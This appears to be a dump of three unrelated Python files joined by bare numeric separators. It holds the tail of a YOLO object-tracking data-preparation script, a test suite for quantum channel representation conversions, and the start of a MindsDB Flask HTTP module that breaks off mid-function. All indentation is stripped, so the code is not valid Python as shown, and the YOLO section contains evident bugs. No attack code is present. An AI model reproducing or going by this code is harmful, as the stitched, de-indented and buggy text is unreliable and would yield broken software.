return tf.maximum(self.alpha*conv_biased,conv_biased,name=str(idx)+'_leaky_relu')
def pooling_layer(self,idx,inputs,size,stride):
if self.disp_console : print ' Layer %d : Type = Pool, Size = %d * %d, Stride = %d' % (idx,size,size,stride)
return tf.nn.max_pool(inputs, ksize=[1, size, size, 1],strides=[1, stride, stride, 1], padding='SAME',name=str(idx)+'_pool')
def fc_layer(self,idx,inputs,hiddens,flat = False,linear = False):
input_shape = inputs.get_shape().as_list()
if flat:
dim = input_shape[1]*input_shape[2]*input_shape[3]
inputs_transposed = tf.transpose(inputs,(0,3,1,2))
inputs_processed = tf.reshape(inputs_transposed, [-1,dim])
else:
dim = input_shape[1]
inputs_processed = inputs
weight = tf.Variable(tf.truncated_normal([dim,hiddens], stddev=0.1))
biases = tf.Variable(tf.constant(0.1, shape=[hiddens]))
if self.disp_console : print ' Layer %d : Type = Full, Hidden = %d, Input dimension = %d, Flat = %d, Activation = %d' % (idx,hiddens,int(dim),int(flat),1-int(linear))
if linear : return tf.add(tf.matmul(inputs_processed,weight),biases,name=str(idx)+'_fc')
ip = tf.add(tf.matmul(inputs_processed,weight),biases)
return tf.maximum(self.alpha*ip,ip,name=str(idx)+'_fc')
def detect_from_cvmat(self,img):
s = time.time()
self.h_img,self.w_img,_ = img.shape
img_resized = cv2.resize(img, (448, 448))
img_RGB = cv2.cvtColor(img_resized,cv2.COLOR_BGR2RGB)
img_resized_np = np.asarray( img_RGB )
inputs = np.zeros((1,448,448,3),dtype='float32')
inputs[0] = (img_resized_np/255.0)*2.0-1.0
in_dict = {self.x: inputs}
net_output = self.sess.run(self.fc_32,feed_dict=in_dict)
self.result = self.interpret_output(net_output[0])
self.show_results(img,self.result)
strtime = str(time.time()-s)
if self.disp_console : print 'Elapsed time : ' + strtime + ' secs' + '\n'
def detect_from_file(self,filename):
if self.disp_console : print 'Detect from ' + filename
img = cv2.imread(filename)
#img = misc.imread(filename)
self.detect_from_cvmat(img)
def detect_from_crop_sample(self):
self.w_img = 640
self.h_img = 420
f = np.array(open('person_crop.txt','r').readlines(),dtype='float32')
inputs = np.zeros((1,448,448,3),dtype='float32')
for c in range(3):
for y in range(448):
for x in range(448):
inputs[0,y,x,c] = f[c*448*448+y*448+x]
in_dict = {self.x: inputs}
net_output = self.sess.run(self.fc_32,feed_dict=in_dict)
self.boxes, self.probs = self.interpret_output(net_output[0])
img = cv2.imread('person.jpg')
self.show_results(self.boxes,img)
def interpret_output(self,output):
probs = np.zeros((7,7,2,20))
class_probs = np.reshape(output[0:980],(7,7,20))
scales = np.reshape(output[980:1078],(7,7,2))
boxes = np.reshape(output[1078:],(7,7,2,4))
offset = np.transpose(np.reshape(np.array([np.arange(7)]*14),(2,7,7)),(1,2,0))
boxes[:,:,:,0] += offset
boxes[:,:,:,1] += np.transpose(offset,(1,0,2))
boxes[:,:,:,0:2] = boxes[:,:,:,0:2] / 7.0
boxes[:,:,:,2] = np.multiply(boxes[:,:,:,2],boxes[:,:,:,2])
boxes[:,:,:,3] = np.multiply(boxes[:,:,:,3],boxes[:,:,:,3])
boxes[:,:,:,0] *= self.w_img
boxes[:,:,:,1] *= self.h_img
boxes[:,:,:,2] *= self.w_img
boxes[:,:,:,3] *= self.h_img
for i in range(2):
for j in range(20):
probs[:,:,i,j] = np.multiply(class_probs[:,:,j],scales[:,:,i])
filter_mat_probs = np.array(probs>=self.threshold,dtype='bool')
filter_mat_boxes = np.nonzero(filter_mat_probs)
boxes_filtered = boxes[filter_mat_boxes[0],filter_mat_boxes[1],filter_mat_boxes[2]]
probs_filtered = probs[filter_mat_probs]
classes_num_filtered = np.argmax(filter_mat_probs,axis=3)[filter_mat_boxes[0],filter_mat_boxes[1],filter_mat_boxes[2]]
argsort = np.array(np.argsort(probs_filtered))[::-1]
boxes_filtered = boxes_filtered[argsort]
probs_filtered = probs_filtered[argsort]
classes_num_filtered = classes_num_filtered[argsort]
for i in range(len(boxes_filtered)):
if probs_filtered[i] == 0 : continue
for j in range(i+1,len(boxes_filtered)):
if self.iou(boxes_filtered[i],boxes_filtered[j]) > self.iou_threshold :
probs_filtered[j] = 0.0
filter_iou = np.array(probs_filtered>0.0,dtype='bool')
boxes_filtered = boxes_filtered[filter_iou]
probs_filtered = probs_filtered[filter_iou]
classes_num_filtered = classes_num_filtered[filter_iou]
result = []
for i in range(len(boxes_filtered)):
result.append([self.classes[classes_num_filtered[i]],boxes_filtered[i][0],boxes_filtered[i][1],boxes_filtered[i][2],boxes_filtered[i][3],probs_filtered[i]])
return result
def show_results(self,img,results):
img_cp = img.copy()
if self.filewrite_txt :
ftxt = open(self.tofile_txt,'w')
for i in range(len(results)):
x = int(results[i][1])
y = int(results[i][2])
w = int(results[i][3])//2
h = int(results[i][4])//2
if self.disp_console : print ' class : ' + results[i][0] + ' , [x,y,w,h]=[' + str(x) + ',' + str(y) + ',' + str(int(results[i][3])) + ',' + str(int(results[i][4]))+'], Confidence = ' + str(results[i][5])
if self.filewrite_img or self.imshow:
cv2.rectangle(img_cp,(x-w,y-h),(x+w,y+h),(0,255,0),2)
cv2.rectangle(img_cp,(x-w,y-h-20),(x+w,y-h),(125,125,125),-1)
cv2.putText(img_cp,results[i][0] + ' : %.2f' % results[i][5],(x-w+5,y-h-7),cv2.FONT_HERSHEY_SIMPLEX,0.5,(0,0,0),1)
if self.filewrite_txt :
ftxt.write(results[i][0] + ',' + str(x) + ',' + str(y) + ',' + str(w) + ',' + str(h)+',' + str(results[i][5]) + '\n')
if self.filewrite_img :
if self.disp_console : print ' image file writed : ' + self.tofile_img
cv2.imwrite(self.tofile_img,img_cp)
if self.imshow :
cv2.imshow('YOLO_small detection',img_cp)
cv2.waitKey(0)
if self.filewrite_txt :
if self.disp_console : print ' txt file writed : ' + self.tofile_txt
ftxt.close()
def iou(self,box1,box2):
tb = min(box1[0]+0.5*box1[2],box2[0]+0.5*box2[2])-max(box1[0]-0.5*box1[2],box2[0]-0.5*box2[2])
lr = min(box1[1]+0.5*box1[3],box2[1]+0.5*box2[3])-max(box1[1]-0.5*box1[3],box2[1]-0.5*box2[3])
if tb < 0 or lr < 0 : intersection = 0
else : intersection = tb*lr
return intersection / (box1[2]*box1[3] + box2[2]*box2[3] - intersection)
# my addition
def createFolder(self, path):
if not os.path.exists(path):
os.makedirs(path)
def debug_location(self, img, location):
img_cp = img.copy()
x = int(location[1])
y = int(location[2])
w = int(location[3])//2
h = int(location[4])//2
cv2.rectangle(img_cp,(x-w,y-h),(x+w,y+h),(0,255,0),2)
cv2.rectangle(img_cp,(x-w,y-h-20),(x+w,y-h),(125,125,125),-1)
cv2.putText(img_cp, str(location[0]) + ' : %.2f' % location[5],(x-w+5,y-h-7),cv2.FONT_HERSHEY_SIMPLEX,0.5,(0,0,0),1)
cv2.imshow('YOLO_small detection',img_cp)
cv2.waitKey(1)
def debug_locations(self, img, locations):
img_cp = img.copy()
for location in locations:
x = int(location[1])
y = int(location[2])
w = int(location[3])//2
h = int(location[4])//2
cv2.rectangle(img_cp,(x-w,y-h),(x+w,y+h),(0,255,0),2)
cv2.rectangle(img_cp,(x-w,y-h-20),(x+w,y-h),(125,125,125),-1)
cv2.putText(img_cp, str(location[0]) + ' : %.2f' % location[5],(x-w+5,y-h-7),cv2.FONT_HERSHEY_SIMPLEX,0.5,(0,0,0),1)
cv2.imshow('YOLO_small detection',img_cp)
cv2.waitKey(1)
def debug_gt_location(self, img, location):
img_cp = img.copy()
x = int(location[0])
y = int(location[1])
w = int(location[2])
h = int(location[3])
cv2.rectangle(img_cp,(x,y),(x+w,y+h),(0,255,0),2)
cv2.imshow('gt',img_cp)
cv2.waitKey(1)
def file_to_img(self, filepath):
img = cv2.imread(filepath)
return img
def file_to_video(self, filepath):
try:
video = cv2.VideoCapture(filepath)
except IOError:
print 'cannot open video file: ' + filepath
else:
print 'unknown error reading video file'
return video
def iou(self,box1,box2):
tb = min(box1[0]+0.5*box1[2],box2[0]+0.5*box2[2])-max(box1[0]-0.5*box1[2],box2[0]-0.5*box2[2])
lr = min(box1[1]+0.5*box1[3],box2[1]+0.5*box2[3])-max(box1[1]-0.5*box1[3],box2[1]-0.5*box2[3])
if tb < 0 or lr < 0 : intersection = 0
else : intersection = tb*lr
return intersection / (box1[2]*box1[3] + box2[2]*box2[3] - intersection)
def find_iou_cost(self, pred_locs, gts):
# for each element in the batch, find its iou. output a list of ious.
cost = 0
batch_size= len(pred_locs)
assert (len(gts)== batch_size)
print("batch_size: ")
ious = []
for i in range(batch_size):
pred_loc = pred_locs[i]
gt = gts[i]
iou_ = self.iou(pred_loc, gt)
ious.append(self, iou_)
return ious
def load_folder(self, path):
paths = [os.path.join(path,fn) for fn in next(os.walk(path))[2]]
#return paths
return sorted(paths)
def load_dataset_gt(self, gt_file):
txtfile = open(gt_file, "r")
lines = txtfile.read().split('\n') #'\r\n'
return lines
def find_gt_location(self, lines, id):
line = lines[id]
elems = line.split('\t') # for gt type 2
if len(elems) < 4:
elems = line.split(',') #for gt type 1
x1 = elems[0]
y1 = elems[1]
w = elems[2]
h = elems[3]
gt_location = [int(x1), int(y1), int(w), int(h)]
return gt_location
def find_best_location(self, locations, gt_location):
# locations (class, x, y, w, h, prob); (x, y) is the middle pt of the rect
# gt_location (x1, y1, w, h)
x1 = gt_location[0]
y1 = gt_location[1]
w = gt_location[2]
h = gt_location[3]
gt_location_revised= [x1 + w/2, y1 + h/2, w, h]
max_ious= 0
for id, location in enumerate(locations):
location_revised = location[1:5]
print("location: ", location_revised)
print("gt_location: ", gt_location_revised)
ious = self.iou(location_revised, gt_location_revised)
if ious >= max_ious:
max_ious = ious
index = id
print("Max IOU: " + str(max_ious))
if max_ious != 0:
best_location = locations[index]
class_index = self.classes.index(best_location[0])
best_location[0]= class_index
return best_location
else: # it means the detection failed, no intersection with the ground truth
return [0, 0, 0, 0, 0, 0]
def save_yolo_output(self, out_fold, yolo_output, filename):
name_no_ext= os.path.splitext(filename)[0]
output_name= name_no_ext
path = os.path.join(out_fold, output_name)
np.save(path, yolo_output)
def location_from_0_to_1(self, wid, ht, location):
location[1] /= wid
location[2] /= ht
location[3] /= wid
location[4] /= ht
return location
def gt_location_from_0_to_1(self, wid, ht, location):
wid *= 1.0
ht *= 1.0
location[0] /= wid
location[1] /= ht
location[2] /= wid
location[3] /= ht
return location
def locations_normal(self, wid, ht, locations):
wid *= 1.0
ht *= 1.0
locations[1] *= wid
locations[2] *= ht
locations[3] *= wid
locations[4] *= ht
return locations
def cal_yolo_loss(self, location, gt_location):
# Translate yolo's box mid-point (x0, y0) to top-left point (x1, y1), in order to compare with gt
location[0] = location[0] - location[2]/2
location[1] = location[1] - location[3]/2
loss= sum([(location[i] - gt_location[i])**2 for i in range(4)]) * 100 / 4
return loss
def cal_yolo_IOU(self, location, gt_location):
# Translate yolo's box mid-point (x0, y0) to top-left point (x1, y1), in order to compare with gt
location[0] = location[0] - location[2]/2
location[1] = location[1] - location[3]/2
loss = self.iou(location, gt_location)
return loss
def prepare_training_data(self, img_fold, gt_file, out_fold): #[or]prepare_training_data(self, list_file, gt_file, out_fold):
''' Pass the data through YOLO, and get the fc_17 layer as features, and get the fc_19 layer as locations
Save the features and locations into file for training LSTM'''
# Reshape the input image
paths= self.load_folder(img_fold)
gt_locations= self.load_dataset_gt(gt_file)
avg_loss = 0
total= 0
total_time= 0
for id, path in enumerate(paths):
filename= os.path.basename(path)
print("processing: ", id, ": ", filename)
img = self.file_to_img(path)
# Pass through YOLO layers
self.h_img,self.w_img,_ = img.shape
img_resized = cv2.resize(img, (448, 448))
img_RGB = cv2.cvtColor(img_resized,cv2.COLOR_BGR2RGB)
img_resized_np = np.asarray( img_RGB )
inputs = np.zeros((1,448,448,3),dtype='float32')
inputs[0] = (img_resized_np/255.0)*2.0-1.0
in_dict = {self.x : inputs}
start_time = time.time()
feature= self.sess.run(self.fc_30,feed_dict=in_dict)
cycle_time = time.time() - start_time
print('cycle time= ', cycle_time)
total_time += cycle_time
output = self.sess.run(self.fc_32,feed_dict=in_dict) # make sure it does not run conv layers twice
locations = self.interpret_output(output[0])
gt_location = self.find_gt_location(gt_locations, id)
location = self.find_best_location(locations, gt_location) # find the ROI that has the maximum IOU with the ground truth
self.debug_location(img, location)
self.debug_gt_location(img, gt_location)
# change location into [0, 1]
loss= self.cal_yolo_IOU(location[1:5], gt_location)
location = self.location_from_0_to_1(self.w_img, self.h_img, location)
avg_loss += loss
total += 1
print("loss: ", loss)
yolo_output= np.concatenate(
( np.reshape(feature, [-1, self.num_feat]),
np.reshape(location, [-1, self.num_predict]) ),
axis = 1)
self.save_yolo_output(out_fold, yolo_output, filename)
avg_loss = avg_loss/total
print("YOLO avg_loss: ", avg_loss)
print "Time Spent on Tracking: " + str(total_time)
print "fps: " + str(id/total_time)
return
def loc_to_coordinates(self, loc):
loc = [i * 32 for i in loc]
x1= int(loc[0]- loc[2]/2)
y1= int(loc[1]- loc[3]/2)
x2= int(loc[0]+ loc[2]/2)
y2= int(loc[1]+ loc[3]/2)
return [x1, y1, x2, y2]
def coordinates_to_heatmap_vec(self, coord):
heatmap_vec = np.zeros(1024)
print(coord)
[classnum, x1, y1, x2, y2, prob] = coord
[x1, y1, x2, y2]= self.loc_to_coordinates([x1, y1, x2, y2])
for y in range(y1, y2):
for x in range(x1, x2):
index = y*32 + x
heatmap_vec[index] = 1.0
return heatmap_vec
def prepare_training_data_heatmap(self, img_fold, gt_file, out_fold): #[or]prepare_training_data(self, list_file, gt_file, out_fold):
''' Pass the data through YOLO, and get the fc_17 layer as features, and get the fc_19 layer as locations
Save the features and locations into file for training LSTM'''
# Reshape the input image
paths= self.load_folder(img_fold)
gt_locations= self.load_dataset_gt(gt_file)
avg_loss = 0
total= 0
for id, path in enumerate(paths):
filename= os.path.basename(path)
print("processing: ", id, ": ", filename)
img = self.file_to_img(path)
# Pass through YOLO layers
self.h_img,self.w_img,_ = img.shape
img_resized = cv2.resize(img, (448, 448))
img_RGB = cv2.cvtColor(img_resized,cv2.COLOR_BGR2RGB)
img_resized_np = np.asarray( img_RGB )
inputs = np.zeros((1,448,448,3),dtype='float32')
inputs[0] = (img_resized_np/255.0)*2.0-1.0
in_dict = {self.x : inputs}
feature= self.sess.run(self.fc_30,feed_dict=in_dict)
output = self.sess.run(self.fc_32,feed_dict=in_dict) # make sure it does not run conv layers twice
locations = self.interpret_output(output[0])
gt_location = self.find_gt_location(gt_locations, id)
location = self.find_best_location(locations, gt_location) # find the ROI that has the maximum IOU with the ground truth
self.debug_location(img, location)
self.debug_gt_location(img, gt_location)
# change location into [0, 1]
loss= self.cal_yolo_IOU(location[1:5], gt_location)
location = self.location_from_0_to_1(self.w_img, self.h_img, location)
heatmap_vec= self.coordinates_to_heatmap_vec(location)
avg_loss += loss
total += 1
print("loss: ", loss)
yolo_output= np.concatenate(
( np.reshape(feature, [-1, self.num_feat]),
np.reshape(heatmap_vec, [-1, self.num_heatmap]) ),
axis = 1)
self.save_yolo_output(out_fold, yolo_output, filename)
avg_loss = avg_loss/total
print("YOLO avg_loss: ", avg_loss)
return
def prepare_training_data_multiTarget(self, img_fold, out_fold):
''' Pass the data through YOLO, and get the fc_17 layer as features, and get the fc_19 layer as locations
Save the features and locations into file for training LSTM'''
# Reshape the input image
print(img_fold)
paths= self.load_folder(img_fold)
avg_loss = 0
total= 0
for id, path in enumerate(paths):
filename= os.path.basename(path)
print("processing: ", id, ": ", filename)
img = self.file_to_img(path)
# Pass through YOLO layers
self.h_img,self.w_img,_ = img.shape
img_resized = cv2.resize(img, (448, 448))
img_RGB = cv2.cvtColor(img_resized,cv2.COLOR_BGR2RGB)
img_resized_np = np.asarray( img_RGB )
inputs = np.zeros((1,448,448,3),dtype='float32')
inputs[0] = (img_resized_np/255.0)*2.0-1.0
in_dict = {self.x : inputs}
feature= self.sess.run(self.fc_30,feed_dict=in_dict)
output = self.sess.run(self.fc_32,feed_dict=in_dict) # make sure it does not run conv layers twice
locations = self.interpret_output(output[0])
self.debug_locations(img, locations)
# change location into [0, 1]
for i in range(0, len(locations)):
class_index = self.classes.index(locations[i][0])
locations[i][0] = class_index
locations[i] = self.location_from_0_to_1(self.w_img, self.h_img, locations[i])
if len(locations)== 1:
print('len(locations)= 1\n')
yolo_output = [[np.reshape(feature, [-1, self.num_feat])], [np.reshape(locations, [-1, self.num_predict]), [0,0,0,0,0,0]]]
else:
yolo_output = [[np.reshape(feature, [-1, self.num_feat])], [np.reshape(locations, [-1, self.num_predict])]]
self.save_yolo_output(out_fold, yolo_output, filename)
return
'''----------------------------------------main-----------------------------------------------------'''
def main(argvs):
yolo = YOLO_TF(argvs)
test = 4
heatmap= False#True
'''
VOT30
0:'Human2'
1:'Human9'
2:'Gym'
3:'Human8'
4:'Skater'
5:'Suv'
6:'BlurBody'
7:'CarScale'
8:'Dancer2'
9:'BlurCar1'
10:'Dog'
11:'Jump'
12:'Singer2'
13:'Woman'
14:'David3'
15:'Dancer'
16:'Human7'
17:'Bird1'
18:'Car4'
19:'CarDark'
20:'Couple'
21:'Diving'
22:'Human3'
23:'Skating1'
24:'Human6'
25:'Singer1'
26:'Skater2'
27:'Walking2'
28:'BlurCar3'
29:'Girl2'
MOT2016
30:'MOT16-02'
31:'MOT16-04'
32:'MOT16-05'
33:'MOT16-09'
34:'MOT16-10'
35:'MOT16-11'
36:'MOT16-13'
37:'MOT16-01'
38:'MOT16-03'
39:'MOT16-06'
40:'MOT16-07'
41:'MOT16-08'
42:'MOT16-12'
43:'MOT16-14'
'''
[yolo.w_img, yolo.h_img, sequence_name, dummy_1, dummy_2]= util.choose_video_sequence(test)
if (test >= 0 and test <= 29) or (test >= 90):
root_folder = 'benchmark/DATA'
img_fold = os.path.join(root_folder, sequence_name, 'img/')
elif test<= 36:
root_folder = 'benchmark/MOT/MOT2016/train'
img_fold = os.path.join(root_folder, sequence_name, 'img1/')
elif test<= 43:
root_folder = 'benchmark/MOT/MOT2016/test'
img_fold = os.path.join(root_folder, sequence_name, 'img1/')
gt_file = os.path.join(root_folder, sequence_name, 'groundtruth_rect.txt')
out_fold = os.path.join(root_folder, sequence_name, 'yolo_out/')
heat_fold = os.path.join(root_folder, sequence_name, 'yolo_heat/')
yolo.createFolder(out_fold)
yolo.createFolder(heat_fold)
if heatmap is True:
yolo.prepare_training_data_heatmap(img_fold, gt_file, heat_fold)
else:
if (test >= 0 and test <= 29) or (test >= 90):
yolo.prepare_training_data(img_fold,gt_file,out_fold)
else:
yolo.prepare_training_data_multiTarget(img_fold,out_fold)
if __name__=='__main__':
main(sys.argv)
|
17258
|
import numpy as np
from pyquil.gate_matrices import X, Y, Z, H
from forest.benchmarking.operator_tools.superoperator_transformations import *
# Test philosophy:
# Using the by hand calculations found in the docs we check conversion
# between one qubit channels with one Kraus operator (Hadamard) and two
# Kraus operators (the amplitude damping channel). Additionally we check
# a few two qubit channel conversions to get additional confidence.
def amplitude_damping_kraus(p):
Ad0 = np.asarray([[1, 0], [0, np.sqrt(1 - p)]])
Ad1 = np.asarray([[0, np.sqrt(p)], [0, 0]])
return [Ad0, Ad1]
def amplitude_damping_chi(p):
poly1 = (1 + np.sqrt(1 - p)) ** 2
poly2 = (-1 + np.sqrt(1 - p)) ** 2
ad_pro = 0.25 * np.asarray([[poly1, 0, 0, p],
[0, p, -1j * p, 0],
[0, 1j * p, p, 0],
[p, 0, 0, poly2]])
return ad_pro
def amplitude_damping_pauli(p):
poly1 = np.sqrt(1 - p)
ad_pau = np.asarray([[1, 0, 0, 0],
[0, poly1, 0, 0],
[0, 0, poly1, 0],
[p, 0, 0, 1 - p]])
return ad_pau
def amplitude_damping_super(p):
poly1 = np.sqrt(1 - p)
ad_sup = np.asarray([[1, 0, 0, p],
[0, poly1, 0, 0],
[0, 0, poly1, 0],
[0, 0, 0, 1 - p]])
return ad_sup
def amplitude_damping_choi(p):
poly1 = np.sqrt(1 - p)
ad_choi = np.asarray([[1, 0, 0, poly1],
[0, 0, 0, 0],
[0, 0, p, 0],
[poly1, 0, 0, 1 - p]])
return ad_choi
HADChi = 0.5 * np.asarray([[0, 0, 0, 0],
[0, 1, 0, 1],
[0, 0, 0, 0],
[0, 1, 0, 1]])
HADPauli = 1.0 * np.asarray([[1, 0, 0, 0],
[0, 0, 0, 1],
[0, 0, -1, 0],
[0, 1, 0, 0]])
HADSuper = 0.5 * np.asarray([[1, 1, 1, 1],
[1, -1, 1, -1],
[1, 1, -1, -1],
[1, -1, -1, 1]])
HADChoi = 0.5 * np.asarray([[1, 1, 1, -1],
[1, 1, 1, -1],
[1, 1, 1, -1],
[-1, -1, -1, 1]])
# Single Qubit Pauli Channel
def one_q_pauli_channel_chi(px, py, pz):
p = (px + py + pz)
pp_chi = np.asarray([[1 - p, 0, 0, 0],
[0, px, 0, 0],
[0, 0, py, 0],
[0, 0, 0, pz]])
return pp_chi
# Pauli twirled Amplitude damping channel
def analytical_pauli_twirl_of_AD_chi(p):
# see equation 7 of https://arxiv.org/pdf/1701.03708.pdf
poly1 = (2 + 2 * np.sqrt(1 - p) - p) / 4
poly2 = p / 4
poly3 = (2 - 2 * np.sqrt(1 - p) - p) / 4
pp_chi = np.asarray([[poly1, 0, 0, 0],
[0, poly2, 0, 0],
[0, 0, poly2, 0],
[0, 0, 0, poly3]])
return pp_chi
# I \otimes Z channel or gate (two qubits)
two_qubit_paulis = n_qubit_pauli_basis(2)
IZKraus = two_qubit_paulis.ops_by_label['IZ']
IZSuper = np.diag([1, -1, 1, -1, -1, 1, -1, 1, 1, -1, 1, -1, -1, 1, -1, 1])
# one and zero state as a density matrix
ONE_STATE = np.asarray([[0, 0], [0, 1]])
ZERO_STATE = np.asarray([[1, 0], [0, 0]])
# Amplitude damping Kraus operators with p = 0.1
AdKrausOps = amplitude_damping_kraus(.1)
# Use Kraus operators to find output of channel i.e.
# rho_out = A_0 rho A_0^\dag + A_1 rho A_1^\dag.
rho_out = np.matmul(np.matmul(AdKrausOps[0], ONE_STATE), AdKrausOps[0].transpose().conj()) + \
np.matmul(np.matmul(AdKrausOps[1], ONE_STATE), AdKrausOps[1].transpose().conj())
def test_vec():
A = np.asarray([[1, 2], [3, 4]])
B = np.asarray([[1, 2, 5], [3, 4, 6]])
np.testing.assert_array_equal(np.array([[1], [3], [2], [4]]), vec(A))
np.testing.assert_array_equal(np.array([[1], [3], [2], [4], [5], [6]]), vec(B))
def test_unvec():
A = np.asarray([[1, 2], [3, 4]])
C = np.asarray([[1, 2, 3], [4, 5, 6], [7, 8, 9]])
np.testing.assert_array_equal(A, unvec(vec(A)))
np.testing.assert_array_equal(C, unvec(vec(C)))
def test_kraus_ops_sum_to_identity():
# Check kraus ops sum to identity
p = np.random.rand()
Ad0, Ad1 = amplitude_damping_kraus(p)
np.testing.assert_array_almost_equal_nulp(np.matmul(Ad0.transpose().conj(), Ad0)
+ np.matmul(Ad1.transpose().conj(), Ad1), np.eye(2))
def test_kraus2chi():
assert np.allclose(HADChi, kraus2chi(H))
p = np.random.rand()
AdKraus = amplitude_damping_kraus(p)
AdChi = amplitude_damping_chi(p)
assert np.allclose(AdChi, kraus2chi(AdKraus))
assert np.allclose(superop2chi(IZSuper), kraus2chi(IZKraus))
def test_kraus2pauli_liouville():
p = np.random.rand()
AdKraus = amplitude_damping_kraus(p)
AdPauli = amplitude_damping_pauli(p)
assert np.allclose(kraus2pauli_liouville(AdKraus), AdPauli)
assert np.allclose(kraus2pauli_liouville(H), HADPauli)
def test_kraus2superop():
p = np.random.rand()
AdKraus = amplitude_damping_kraus(p)
AdSuper = amplitude_damping_super(p)
np.testing.assert_array_almost_equal_nulp(kraus2superop(AdKraus), AdSuper)
# test application of super operator is the same as application of Kraus ops
ONE_STATE_VEC = vec(ONE_STATE)
np.testing.assert_array_almost_equal_nulp(unvec(np.matmul(kraus2superop(AdKrausOps),
ONE_STATE_VEC)), rho_out)
assert np.allclose(kraus2superop(H), HADSuper)
assert np.allclose(kraus2superop(IZKraus), IZSuper)
# Below here tests non square Kraus operators
# In this example The Kraus operator is M_0 = I \otimes <0| where <0| = (1,0)
Idd = np.asarray([[1, 0], [0, 1]])
M0 = np.kron(Idd, np.asarray([[1, 0]]))
attempt = kraus2superop(M0)
answer = np.kron(M0.conj(), M0)
assert np.allclose(answer, attempt)
def test_kraus2choi():
p = np.random.rand()
AdKraus = amplitude_damping_kraus(p)
AdChoi = amplitude_damping_choi(p)
assert np.allclose(kraus2choi(AdKraus), AdChoi)
assert np.allclose(kraus2choi(H), HADChoi)
def test_chi2pauli_liouville():
p = np.random.rand()
AdChi = amplitude_damping_chi(p)
AdPauli = amplitude_damping_pauli(p)
assert np.allclose(AdPauli, chi2pauli_liouville(AdChi))
assert np.allclose(HADPauli, chi2pauli_liouville(HADChi))
def test_basis_transform_p_to_c():
xz_pauli_basis = np.zeros((16, 1))
xz_pauli_basis[7] = [1.]
assert np.allclose(unvec(pauli2computational_basis_matrix(4) @ xz_pauli_basis), np.kron(X, Z))
def test_basis_transform_c_to_p():
xz_pauli_basis = np.zeros((16, 1))
xz_pauli_basis[7] = [1.]
assert np.allclose(computational2pauli_basis_matrix(4) @ vec(np.kron(X, Z)), xz_pauli_basis)
def test_pl_to_choi():
for i, pauli in enumerate(n_qubit_pauli_basis(2)):
pl = kraus2pauli_liouville(pauli[1])
choi = kraus2choi(pauli[1])
assert np.allclose(choi, pauli_liouville2choi(pl))
pl = kraus2pauli_liouville(H)
choi = kraus2choi(H)
assert np.allclose(choi, pauli_liouville2choi(pl))
def test_superop_to_kraus():
assert np.allclose(superop2kraus(IZSuper), IZKraus)
p = np.random.rand()
AdSuper = amplitude_damping_super(p)
AdKraus = amplitude_damping_kraus(p)
kraus_ops = superop2kraus(AdSuper)
# the order of the Kraus ops matters
# TODO: fix the sign problem in Kraus operators
assert np.allclose([np.abs(kraus_ops[1]), np.abs(kraus_ops[0])], AdKraus)
def test_superop_to_choi():
for i, pauli in enumerate(n_qubit_pauli_basis(2)):
superop = kraus2superop(pauli[1])
choi = kraus2choi(pauli[1])
assert np.allclose(choi, superop2choi(superop))
p = np.random.rand()
AdSuper = amplitude_damping_super(p)
AdChoi = amplitude_damping_choi(p)
assert np.allclose(AdChoi, superop2choi(AdSuper))
superop = kraus2superop(H)
choi = kraus2choi(H)
assert np.allclose(choi, superop2choi(superop))
def test_superop_to_pl():
p = np.random.rand()
AdSuper = amplitude_damping_super(p)
AdPauli = amplitude_damping_pauli(p)
assert np.allclose(AdPauli, superop2pauli_liouville(AdSuper))
AdKraus = amplitude_damping_kraus(p)
superop = kraus2superop(AdKraus)
pauli = kraus2pauli_liouville(AdKraus)
assert np.allclose(pauli, superop2pauli_liouville(superop))
def test_pauli_liouville_to_superop():
p = np.random.rand()
AdSuper = amplitude_damping_super(p)
AdPauli = amplitude_damping_pauli(p)
assert np.allclose(AdSuper, pauli_liouville2superop(AdPauli))
AdKraus = amplitude_damping_kraus(p)
superop = kraus2superop(AdKraus)
pauli = kraus2pauli_liouville(AdKraus)
assert np.allclose(superop, pauli_liouville2superop(pauli))
def test_choi_to_kraus():
for i, pauli in enumerate(n_qubit_pauli_basis(2)):
choi = kraus2choi(pauli[1])
kraus = choi2kraus(choi)
assert np.allclose(choi, kraus2choi(kraus))
id_choi = np.array([[1, 0, 0, 1], [0, 0, 0, 0], [0, 0, 0, 0], [1, 0, 0, 1]])
assert np.allclose(kraus2choi(choi2kraus(id_choi)), id_choi)
for kraus in choi2kraus(id_choi):
assert np.allclose(abs(kraus), np.eye(2)) or np.allclose(kraus, np.zeros((2, 2)))
def test_choi_to_super():
p = np.random.rand()
AdSuper = amplitude_damping_super(p)
AdChoi = amplitude_damping_choi(p)
assert np.allclose(AdSuper, choi2superop(AdChoi))
def test_choi_pl_bijectivity():
assert np.allclose(choi2superop(choi2superop(np.eye(4))), np.eye(4))
assert np.allclose(superop2choi(superop2choi(np.eye(4))), np.eye(4))
h_choi = kraus2choi(H)
h_superop = kraus2superop(H)
assert np.allclose(choi2superop(choi2superop(h_choi)), h_choi)
assert np.allclose(superop2choi(superop2choi(h_superop)), h_superop)
|
17263
|
from distutils.version import LooseVersion
import requests
import os
import shutil
import threading
import webbrowser
from zipfile import ZipFile
from pathlib import Path
import traceback
import tempfile
# import concurrent.futures
from flask import Flask, url_for, make_response
from flask.json import dumps
from flask_restx import Api
from mindsdb.__about__ import __version__ as mindsdb_version
from mindsdb.interfaces.datastore.datastore import DataStore
from mindsdb.interfaces.model.model_interface import ModelInterface
from mindsdb.interfaces.database.integrations import IntegrationController
from mindsdb.utilities.ps import is_pid_listen_port, wait_func_is_true
from mindsdb.utilities.telemetry import inject_telemetry_to_static
from mindsdb.utilities.config import Config
from mindsdb.utilities.log import get_log
from mindsdb.interfaces.storage.db import session
from mindsdb.utilities.json_encoder import CustomJSONEncoder
class Swagger_Api(Api):
"""
This is a modification of the base Flask Restplus Api class due to the issue described here
https://github.com/noirbizarre/flask-restplus/issues/223
"""
@property
def specs_url(self):
return url_for(self.endpoint("specs"), _external=False)
def custom_output_json(data, code, headers=None):
resp = make_response(dumps(data), code)
resp.headers.extend(headers or {})
return resp
def get_last_compatible_gui_version() -> LooseVersion:
log = get_log('http')
try:
res = requests.get('https://mindsdb-web-builds.s3.amazonaws.com/compatible-config.json', timeout=5)
except (ConnectionError, requests.exceptions.ConnectionError) as e:
print(f'Is no connection. {e}')
return False
except Exception as e:
print(f'Is something wrong with getting compatible-config.json: {e}')
return False
if res.status_code != 200:
print(f'Cant get compatible-config.json: returned status code = {res.status_code}')
return False
try:
versions = res.json()
except Exception as e:
print(f'Cant decode compatible-config.json: {e}')
return False
current_mindsdb_lv = LooseVersion(mindsdb_version)
try:
gui_versions = {}
max_mindsdb_lv = None
